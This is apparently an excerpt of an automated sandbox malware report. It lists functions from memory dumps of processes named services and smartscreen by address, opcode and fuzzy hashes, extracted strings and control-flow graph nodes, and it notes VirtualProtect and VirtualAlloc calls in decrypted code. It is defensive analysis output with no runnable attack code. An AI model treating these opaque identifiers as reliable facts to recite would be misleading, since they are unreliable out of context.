                                                                                                      • Opcode ID: 45174153ba568568e1a2ad49531db7c599daa20e11b94041945d56fe6e5957f0
                                                                                                      • Instruction ID: a0ca769d4f22e7478f1b6f4837c47f51996a7bcb9f7cb3d4cfd0310ef74404f1
                                                                                                      • Opcode Fuzzy Hash: 45174153ba568568e1a2ad49531db7c599daa20e11b94041945d56fe6e5957f0
                                                                                                      • Instruction Fuzzy Hash: 53118835A1864ECFDF44EF28C841AE97BA0FB58359F1501AAE849D3261C730A965CB80
                                                                                                      Function 00007FFD9B880C48 Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c4f5994b172ab1db723f1c8eb688de1477a3c12c77f08869067558d45011bf10
                                                                                                      • Instruction ID: b52885abce043745989a6b9127e06d4817ab884dcd761fe354d876d5ff3a79d5
                                                                                                      • Opcode Fuzzy Hash: c4f5994b172ab1db723f1c8eb688de1477a3c12c77f08869067558d45011bf10
                                                                                                      • Instruction Fuzzy Hash: 2411E571E0E68E8FE7129F64CC211A97B71EF46700F0545B3D061DB1E2DA386619C791
                                                                                                      Function 00007FFD9B880C50 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c5fa458fe9338bd6a2fa62707b7b77d4a7823b951c1fc4e039963d5fc156a45a
                                                                                                      • Instruction ID: bbeeb0cbf80e45d9773ce53c21d31c168d03496b0504832c66cf3a90f4001c48
                                                                                                      • Opcode Fuzzy Hash: c5fa458fe9338bd6a2fa62707b7b77d4a7823b951c1fc4e039963d5fc156a45a
                                                                                                      • Instruction Fuzzy Hash: F8010430E0E6CE8FE7129BA4CC201A97B71EF06700F0545B3C061DB1E2CA386604C741
                                                                                                      Function 00007FFD9B8806A5 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 94c6d9623fc8b288a0e81046ce47f075aed2357cbc0343b99f8acae12c7abc87
                                                                                                      • Instruction ID: b18f13679e91bf12ccabc90f712a1b13667a59766257d6f1f47802074d447a78
                                                                                                      • Opcode Fuzzy Hash: 94c6d9623fc8b288a0e81046ce47f075aed2357cbc0343b99f8acae12c7abc87
                                                                                                      • Instruction Fuzzy Hash: C4F03030A19A0E9FEF50EF58D8596ED7BE0FF58305F510436E42CD21A0DA34A2A0C781
                                                                                                      Function 00007FFD9B8813E0 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2f07963ea91fe11143c8df7f29f13a392f25eba43048f6d39f3875d70c6facb2
                                                                                                      • Instruction ID: 9893dd97ebb5eb87a875b7ac293acfaf0b6f4326cef32cecaf3199a00327baf9
                                                                                                      • Opcode Fuzzy Hash: 2f07963ea91fe11143c8df7f29f13a392f25eba43048f6d39f3875d70c6facb2
                                                                                                      • Instruction Fuzzy Hash: DFF0BD30A1494D9FDF94EF58C448AEA7BE0FF68305F010566F819D7264D730E994CB81
                                                                                                      Function 00007FFD9B8806C0 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c461850076429782ab2a6b1635be913ae16ed7bc5acd679633a9097cc6c3da33
                                                                                                      • Instruction ID: 2cdd325a623555fb0fc435f0d73c7214a6c0723e1a2398f156606d567e5ce497
                                                                                                      • Opcode Fuzzy Hash: c461850076429782ab2a6b1635be913ae16ed7bc5acd679633a9097cc6c3da33
                                                                                                      • Instruction Fuzzy Hash: 7FF0303091990E9FEB54EF6498596ED7BE0FF18304F510176E42CD21A5DA34A2A08781
                                                                                                      Function 00007FFD9B885E96 Relevance: .0, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b57fd32d69fabe09c8a69e6f4bfa3f6c048901c29123a4572fa243570d179f16
                                                                                                      • Instruction ID: 91ad04335379f1d7aa2a0288bbef6014fcaec9bedfc3efeb98ae786dcd000b1b
                                                                                                      • Opcode Fuzzy Hash: b57fd32d69fabe09c8a69e6f4bfa3f6c048901c29123a4572fa243570d179f16
                                                                                                      • Instruction Fuzzy Hash: 4301C834E1A96DCFE775DB54C894BE9B3B1AB58302F5582F5C01D922A1DF386AC48F40
                                                                                                      Function 00007FFD9B8898F1 Relevance: .0, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 98c154f2b23acde14f10363f0e32d09e25e4c400e3ad63d9c0f4789e598c4f19
                                                                                                      • Instruction ID: ce5c8e89959c6869c4887147c168332546380a69df85e86cc542b26f06e912b5
                                                                                                      • Opcode Fuzzy Hash: 98c154f2b23acde14f10363f0e32d09e25e4c400e3ad63d9c0f4789e598c4f19
                                                                                                      • Instruction Fuzzy Hash: 83F03071E0991D8FEBE5EB1C98686A9A7A1EF5C301F1142FAD02DD2292DE342AC54F01
                                                                                                      Function 00007FFD9B880CD7 Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bf57402f309e657f9be3641175904decab9841b46204b5067f24f4a106bfaf4a
                                                                                                      • Instruction ID: 202e6ce3f6543c936545d7c2d56e8d0ad153ab0f92b7b14f079edff5c9ecfae7
                                                                                                      • Opcode Fuzzy Hash: bf57402f309e657f9be3641175904decab9841b46204b5067f24f4a106bfaf4a
                                                                                                      • Instruction Fuzzy Hash: 9BF0CD70A09A1A8BE714DF84C8A83F9B7B1FF54301F04067AC025932A2CBB86680CB80
                                                                                                      Function 00007FFD9B8873E8 Relevance: .0, Instructions: 25COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a8306ff9a33f502b701b8e6e1f20e64faf06682f9eed7694088954d3e87ed7ff
                                                                                                      • Instruction ID: 54b12fa71c3057d90013d0ccd98984962e175cf1ce72ea82f2de72b00f9dc292
                                                                                                      • Opcode Fuzzy Hash: a8306ff9a33f502b701b8e6e1f20e64faf06682f9eed7694088954d3e87ed7ff
                                                                                                      • Instruction Fuzzy Hash: BDF0FE70E0591D8BE7A4EB18DC656A977A1EF84345F1041F6901E9A2D6CE342E828F40
                                                                                                      Function 00007FFD9B889889 Relevance: .0, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cc7573d97922cb5c0494f88cc9b86afb02f4643be1d1fa1d3be5d0a01a42f0d5
                                                                                                      • Instruction ID: c9f25af492ffea1b6f83bd6cbd4b3840a599817e5efd073d4e4114facd1b5707
                                                                                                      • Opcode Fuzzy Hash: cc7573d97922cb5c0494f88cc9b86afb02f4643be1d1fa1d3be5d0a01a42f0d5
                                                                                                      • Instruction Fuzzy Hash: 7BE03031E0981D8BEBB0EB0C8854AA963B0EB5C300F1142F5C01DD2191CE342A814F41

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.6%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:7
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 20813 7ffd9b8c17ce 20814 7ffd9b8c17dd VirtualProtect 20813->20814 20816 7ffd9b8c191d 20814->20816 20817 7ffd9b8c31bd 20818 7ffd9b8c31db VirtualAlloc 20817->20818 20819 7ffd9b8c3173 20817->20819 20821 7ffd9b8c32f5 20818->20821

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B8CAEFD Relevance: 4.3, Strings: 1, Instructions: 3029COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8ca000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: qJ_H
                                                                                                      • API String ID: 0-3404634314
                                                                                                      • Opcode ID: 0ab4bc338a482c64423d6ee39bfd6d6b68aeb464db51e4b80d8ac2c5bfd27a52
                                                                                                      • Instruction ID: ce4f43a25ace9c80770baaa19cccc796505d1f9be4ff38e108a943f6bda9cb77
                                                                                                      • Opcode Fuzzy Hash: 0ab4bc338a482c64423d6ee39bfd6d6b68aeb464db51e4b80d8ac2c5bfd27a52
                                                                                                      • Instruction Fuzzy Hash: 8843CF70A1995D8FDBA8EB58C8A5BB9B7B1FF58300F1442EAD00DD3295DA356E81CF40
                                                                                                      Function 00007FFD9B8F91CD Relevance: 1.8, Strings: 1, Instructions: 520COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 501 7ffd9b8f91cd-7ffd9b8f91ec 503 7ffd9b8f9236-7ffd9b8f92c5 501->503 504 7ffd9b8f91ee-7ffd9b8f9222 501->504 508 7ffd9b8f92c7-7ffd9b8f92cc 503->508 509 7ffd9b8f92cf-7ffd9b8f92d8 503->509 506 7ffd9b8f9229-7ffd9b8f9233 504->506 507 7ffd9b8f9224 504->507 506->503 507->506 508->509 510 7ffd9b8f9750-7ffd9b8f9756 509->510 511 7ffd9b8f975c-7ffd9b8f9775 510->511 512 7ffd9b8f92dd-7ffd9b8f9307 510->512 513 7ffd9b8f9309 512->513 514 7ffd9b8f930e-7ffd9b8f9327 512->514 513->514 515 7ffd9b8f9329 514->515 516 7ffd9b8f932e-7ffd9b8f9348 514->516 515->516 518 7ffd9b8f934a 516->518 519 7ffd9b8f934f-7ffd9b8f9367 516->519 518->519 520 7ffd9b8f9369 519->520 521 7ffd9b8f936e-7ffd9b8f938f 519->521 520->521 522 7ffd9b8f9391-7ffd9b8f9395 521->522 523 7ffd9b8f93fd-7ffd9b8f941a 521->523 522->523 524 7ffd9b8f9397-7ffd9b8f93ab 522->524 525 7ffd9b8f941c 523->525 526 7ffd9b8f9421-7ffd9b8f943a 523->526 529 7ffd9b8f93ef-7ffd9b8f93f5 524->529 525->526 527 7ffd9b8f943c 526->527 528 7ffd9b8f9441-7ffd9b8f945b 526->528 527->528 530 7ffd9b8f9462-7ffd9b8f947a 528->530 531 7ffd9b8f945d 528->531 532 7ffd9b8f93f7-7ffd9b8f93f8 529->532 533 7ffd9b8f93ad-7ffd9b8f93b1 529->533 536 7ffd9b8f947c 530->536 537 7ffd9b8f9481-7ffd9b8f948b 530->537 531->530 538 7ffd9b8f948e-7ffd9b8f9590 532->538 534 7ffd9b8f93bc-7ffd9b8f93d2 533->534 535 7ffd9b8f93b3-7ffd9b8f93b9 533->535 539 7ffd9b8f93d9-7ffd9b8f93ec 534->539 540 7ffd9b8f93d4 534->540 535->534 536->537 537->538 541 7ffd9b8f95a5-7ffd9b8f9612 538->541 542 7ffd9b8f9592-7ffd9b8f95a2 538->542 539->529 540->539 543 7ffd9b8f966b-7ffd9b8f966f 541->543 544 7ffd9b8f9614-7ffd9b8f962d 541->544 542->541 545 7ffd9b8f9676-7ffd9b8f968f 543->545 546 7ffd9b8f9671 543->546 547 7ffd9b8f96a0-7ffd9b8f96b7 544->547 548 7ffd9b8f962f-7ffd9b8f9633 544->548 549 7ffd9b8f9692-7ffd9b8f9698 545->549 546->545 550 7ffd9b8f96b9 547->550 551 7ffd9b8f96be-7ffd9b8f96d8 547->551 548->547 552 7ffd9b8f9635-7ffd9b8f9644 548->552 553 7ffd9b8f969a-7ffd9b8f969b 549->553 554 7ffd9b8f9646-7ffd9b8f964a 549->554 550->551 555 7ffd9b8f96da 551->555 556 7ffd9b8f96df-7ffd9b8f9703 551->556 552->549 559 7ffd9b8f9748-7ffd9b8f974d 553->559 557 7ffd9b8f964c-7ffd9b8f965b 554->557 558 7ffd9b8f965e-7ffd9b8f9665 554->558 555->556 560 7ffd9b8f970a-7ffd9b8f972e 556->560 561 7ffd9b8f9705 556->561 557->558 558->543 559->510 562 7ffd9b8f9735-7ffd9b8f9746 560->562 563 7ffd9b8f9730 560->563 561->560 562->559 563->562
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078
                                                                                                      • Opcode ID: fd74d8c7fe9b069e3c7b9e349bfec20b3d3656f44cbffb566e0097a072cef904
                                                                                                      • Instruction ID: 43f36b996fb45f61fb2f18c017092a5942de1c8933dfd5a3f0d27990c28b6a35
                                                                                                      • Opcode Fuzzy Hash: fd74d8c7fe9b069e3c7b9e349bfec20b3d3656f44cbffb566e0097a072cef904
                                                                                                      • Instruction Fuzzy Hash: 8C222870E0461D8FDB58DFA8C495AEDBBF1FF48300F148669D419EB25ADA34A981CF90
                                                                                                      Function 00007FFD9B904164 Relevance: 1.6, Strings: 1, Instructions: 374COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8f7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: 5f78ed12253201c222747148935081fbd1acccfdeb47df7c657ac97a7e06da3e
                                                                                                      • Instruction ID: a8364039cacca9f7acccac6bc0fa17bc57150b46176bc87bfd1a790a430e70bc
                                                                                                      • Opcode Fuzzy Hash: 5f78ed12253201c222747148935081fbd1acccfdeb47df7c657ac97a7e06da3e
                                                                                                      • Instruction Fuzzy Hash: B2F10D74E1965D9FDBA8DB58C8A5BB8B7F1FB58300F5101BAD04DE32A5DA346A80CF40
                                                                                                      Function 00007FFD9B8BF36C Relevance: .7, Instructions: 738COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 683 7ffd9b8bf36c-7ffd9b8bf397 684 7ffd9b8bf398-7ffd9b8bf3ba 683->684 686 7ffd9b8bf3bc-7ffd9b8bf415 684->686 690 7ffd9b8bf46e-7ffd9b8bf474 686->690 691 7ffd9b8bf417-7ffd9b8bf46b 690->691 692 7ffd9b8bf476-7ffd9b8bf4d9 call 7ffd9b8bfe91 690->692 691->690 702 7ffd9b8bfe72-7ffd9b8bfe7f 692->702 703 7ffd9b8bfe85-7ffd9b8bfe90 702->703 704 7ffd9b8bf4de-7ffd9b8bf4ed 702->704 706 7ffd9b8bf4ef 704->706 707 7ffd9b8bf4f4-7ffd9b8bf65e 704->707 706->707 718 7ffd9b8bf660-7ffd9b8bf69e 707->718 719 7ffd9b8bf6d2-7ffd9b8bf772 707->719 723 7ffd9b8bf6a9-7ffd9b8bf6cd 718->723 728 7ffd9b8bf774-7ffd9b8bf7e1 719->728 729 7ffd9b8bf7e3-7ffd9b8bf82b 719->729 726 7ffd9b8bfe6a-7ffd9b8bfe6f 723->726 726->702 735 7ffd9b8bf836-7ffd9b8bf83c 728->735 729->735 736 7ffd9b8bf8be-7ffd9b8bf8cb 735->736 737 7ffd9b8bf841-7ffd9b8bf868 736->737 738 7ffd9b8bf8d1-7ffd9b8bf983 736->738 739 7ffd9b8bf86a 737->739 740 7ffd9b8bf86f-7ffd9b8bf8bb 737->740 747 7ffd9b8bfc00-7ffd9b8bfc06 738->747 739->740 740->736 748 7ffd9b8bf988-7ffd9b8bf98c 747->748 749 7ffd9b8bfc0c-7ffd9b8bfc1f 747->749 750 7ffd9b8bf9a9-7ffd9b8bfbaa 748->750 751 7ffd9b8bf98e-7ffd9b8bf9a5 748->751 752 7ffd9b8bfc20-7ffd9b8bfc2a 749->752 757 7ffd9b8bfbad-7ffd9b8bfbaf 750->757 751->750 756 7ffd9b8bfc2f-7ffd9b8bfc37 752->756 761 7ffd9b8bfca8 756->761 762 7ffd9b8bfc38-7ffd9b8bfc3b 756->762 757->752 758 7ffd9b8bfbb1-7ffd9b8bfbb3 757->758 758->756 760 7ffd9b8bfbb5 758->760 763 7ffd9b8bfbb7 760->763 764 7ffd9b8bfb3c 760->764 767 7ffd9b8bfca9-7ffd9b8bfcb1 761->767 765 7ffd9b8bfcb7-7ffd9b8bfcc9 762->765 766 7ffd9b8bfc3d 762->766 771 7ffd9b8bfbbc 763->771 764->757 770 7ffd9b8bfb3e-7ffd9b8bfb40 764->770 768 7ffd9b8bfccb-7ffd9b8bfccd 765->768 769 7ffd9b8bfd3a-7ffd9b8bfd3e 765->769 772 7ffd9b8bfc3e-7ffd9b8bfc40 766->772 773 7ffd9b8bfbc4 766->773 767->765 774 7ffd9b8bfd49-7ffd9b8bfd52 768->774 775 7ffd9b8bfccf 768->775 769->774 770->771 776 7ffd9b8bfb42 770->776 771->762 777 7ffd9b8bfbbe-7ffd9b8bfbc2 771->777 778 7ffd9b8bfc56-7ffd9b8bfc9c 772->778 779 7ffd9b8bfbc6 773->779 780 7ffd9b8bfb4b 773->780 786 7ffd9b8bfd54 774->786 787 7ffd9b8bfdc3-7ffd9b8bfdd3 774->787 775->778 781 7ffd9b8bfcd1 775->781 782 7ffd9b8bfac9-7ffd9b8bfacb 776->782 783 7ffd9b8bfb44 776->783 777->772 777->773 788 7ffd9b8bfcf1-7ffd9b8bfd1c 778->788 796 7ffd9b8bfc9e-7ffd9b8bfca6 778->796 785 7ffd9b8bfbcb-7ffd9b8bfbf2 779->785 784 7ffd9b8bfb4c-7ffd9b8bfb4f 780->784 781->788 782->784 794 7ffd9b8bfacd 782->794 783->780 784->785 790 7ffd9b8bfb51 784->790 798 7ffd9b8bfbf8-7ffd9b8bfbfd 785->798 791 7ffd9b8bfd8d 786->791 792 7ffd9b8bfdd5-7ffd9b8bfdd7 787->792 793 7ffd9b8bfe44-7ffd9b8bfe52 787->793 788->791 806 7ffd9b8bfd1e-7ffd9b8bfd22 788->806 795 7ffd9b8bfad8-7ffd9b8bfada 790->795 797 7ffd9b8bfb53 790->797 791->787 799 7ffd9b8bfe53-7ffd9b8bfe68 792->799 800 7ffd9b8bfdd9-7ffd9b8bfddb 792->800 793->799 794->795 802 7ffd9b8bfadc-7ffd9b8bfb0c 795->802 803 7ffd9b8bfb5b-7ffd9b8bfb82 795->803 796->761 797->803 798->747 799->726 800->793 802->798 803->798 806->767 811 7ffd9b8bfd24 806->811 811->769
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8bc000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d498d35fe9c030caff40eee3ce68467065292aa64797ee5e55cdcd67e4082a48
                                                                                                      • Instruction ID: 59404ba5a710bedd740fe70546fa5101ade716f3f2e2ed4917d7aac6ccd83105
                                                                                                      • Opcode Fuzzy Hash: d498d35fe9c030caff40eee3ce68467065292aa64797ee5e55cdcd67e4082a48
                                                                                                      • Instruction Fuzzy Hash: 0852BA74E0992D8FDBA9DB58C8A5BA8B7B1FF58301F5001E9D40DD72A5DA34AE81CF40
                                                                                                      Function 00007FFD9B8B0DA0 Relevance: .3, Instructions: 293COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 896 7ffd9b8b0da0-7ffd9b8b0db7 897 7ffd9b8b0db9 896->897 898 7ffd9b8b0dba-7ffd9b8b0df9 896->898 897->898 899 7ffd9b8b0dfb 898->899 900 7ffd9b8b0e00-7ffd9b8b0eb7 call 7ffd9b8b07d0 898->900 899->900 913 7ffd9b8b0eb9-7ffd9b8b0ece 900->913 914 7ffd9b8b0ecf-7ffd9b8b0fa8 900->914 913->914 927 7ffd9b8b0faa-7ffd9b8b0fbe 914->927 928 7ffd9b8b0fc0-7ffd9b8b0fe3 914->928 927->928 931 7ffd9b8b0feb-7ffd9b8b10dc 928->931
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b0000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a9167b994a58f3f05935598e28b3ee7941ec8b50bdb52fa12049bc8dd969dc25
                                                                                                      • Instruction ID: d1a6990bc184a078b1d264b5cbcf1b6fd3e5bd37d60b96f725269932dae869fb
                                                                                                      • Opcode Fuzzy Hash: a9167b994a58f3f05935598e28b3ee7941ec8b50bdb52fa12049bc8dd969dc25
                                                                                                      • Instruction Fuzzy Hash: AAA1D5B1A19A5D8FD798DB68C8657A9BFE1FF59310F4001BED049D72EACB782801CB41
                                                                                                      Function 00007FFD9B8C5F66 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 481 7ffd9b8c5f66-7ffd9b8c5f99 483 7ffd9b8c5fa3-7ffd9b8c5fbb 481->483 484 7ffd9b8c5fc6-7ffd9b8c5fcd 483->484 485 7ffd9b8c5fcf-7ffd9b8c66d7 484->485 486 7ffd9b8c5fed-7ffd9b8c6783 484->486 485->484 493 7ffd9b8c66dd-7ffd9b8c66e7 485->493 486->484 493->484
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8c5000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: +$pO_H
                                                                                                      • API String ID: 0-3174383562
                                                                                                      • Opcode ID: cba1316061d1e5d4de150c412fd7e33a5d8011d10cfeb8d0856a63c1ba8d0d6c
                                                                                                      • Instruction ID: f860edcf78b7433ca9f67f518045b2a17af05d9ceb8e1cb84ae0c09abf0221ed
                                                                                                      • Opcode Fuzzy Hash: cba1316061d1e5d4de150c412fd7e33a5d8011d10cfeb8d0856a63c1ba8d0d6c
                                                                                                      • Instruction Fuzzy Hash: 0F11ECB4A1A61D8BDBB8DB58C8A47E977B1EB5C300F1141A9E00ED7395CE786B84CB40
                                                                                                      Function 00007FFD9B8BAE5E Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 494 7ffd9b8bae5e-7ffd9b8bae72 495 7ffd9b8bae7c-7ffd9b8bae89 494->495 496 7ffd9b8b8ba8-7ffd9b8b8bfd 495->496 497 7ffd9b8bae8f-7ffd9b8baebf 495->497
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8B6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B6000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b8b6000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$)
                                                                                                      • API String ID: 0-2010264150
                                                                                                      • Opcode ID: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction ID: b13dcafab310b3614f50832ca9006d92f5bf462bd641c6c32ffca35281652be5
                                                                                                      • Opcode Fuzzy Hash: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction Fuzzy Hash: 9411CE70D1662E8EEBB4AB69C8587A9B6B0FF08301F1140F9D44DA2291DB745AC48F46
                                                                                                      Function 00007FFD9B8C17CE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 565 7ffd9b8c17ce-7ffd9b8c17db 566 7ffd9b8c17e6-7ffd9b8c17f7 565->566 567 7ffd9b8c17dd-7ffd9b8c17e5 565->567 568 7ffd9b8c17f9-7ffd9b8c1801 566->568 569 7ffd9b8c1802-7ffd9b8c191b VirtualProtect 566->569 567->566 568->569 574 7ffd9b8c191d 569->574 575 7ffd9b8c1923-7ffd9b8c1973 569->575 574->575
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000031.00000002.2232154009.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
